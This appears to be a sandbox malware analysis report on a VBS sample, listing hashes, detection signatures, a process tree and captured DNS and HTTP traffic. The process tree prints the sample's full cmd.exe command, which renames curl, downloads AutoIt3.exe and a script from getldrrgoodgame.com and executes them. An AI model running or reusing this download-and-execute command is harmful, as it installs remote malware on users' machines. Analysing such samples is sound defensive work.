Overview

overview

10

Static

static

1

Test_395-13959.vbs

windows7-x64

8

Test_395-13959.vbs

windows10-2004-x64

10

Resubmissions

04/10/2023, 14:22 UTC

231004-rpmycsed29 10

04/10/2023, 13:53 UTC

231004-q6y7aaeb22 10

Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    04/10/2023, 13:53 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Test_395-13959.vbs

  • Size

    6.9MB

  • MD5

    5a9c56d5b6a4ae5fc402d99fa45f5598

  • SHA1

    d1572724ca4ecc99edaf4104f51385265bb27682

  • SHA256

    961372719771b69d8cf4d62f2b3703d7322544d16dc08036a217102382200498

  • SHA512

    5c9ab4ba5c102217077e6b4981f99c1bbf7e0a1842bfe38edcaa5e5b59d3c7bc11a8954eb8917d05dc7addc4023fbc0758e7ed2ddcce861503ff940fcad93e57

  • SSDEEP

    49152:jzgZNELkkGo137QXFsHKCaEcFMICJ/r1lHszS6rY7fch38ZkcwMKvmLXhEbvYrTJ:t

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Test_395-13959.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir c:\omxg & cd /d c:\omxg & copy c:\windows\system32\curl.exe omxg.exe & omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351 & omxg -o xqkbij.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu & Autoit3.exe xqkbij.au3
      2⤵
        PID:2284

    Network

    • flag-us
      DNS
      getldrrgoodgame.com
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      getldrrgoodgame.com
      IN A
      Response
      getldrrgoodgame.com
      IN A
      81.19.135.139
    • flag-ru
      POST
      http://getldrrgoodgame.com:2351/omxgnyqu
      WScript.exe
      Remote address:
      81.19.135.139:2351
      Request
      POST /omxgnyqu HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
      a: a
      Content-Length: 0
      Host: getldrrgoodgame.com:2351
      Response
      HTTP/1.1 200 OK
      Connection: close
      Content-Type: text/html; charset=ISO-8859-1
      Content-Length: 243
      Date: Wed, 04 Oct 2023 13:53:14 GMT
    • 81.19.135.139:2351
      http://getldrrgoodgame.com:2351/omxgnyqu
      http
      WScript.exe
      468 B
       596 B
       6
      5

      HTTP Request

      POST http://getldrrgoodgame.com:2351/omxgnyqu

      HTTP Response

      200
    • 8.8.8.8:53
      getldrrgoodgame.com
      dns
      WScript.exe
      65 B
       81 B
       1
      1

      DNS Request

      getldrrgoodgame.com

      DNS Response

      81.19.135.139

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.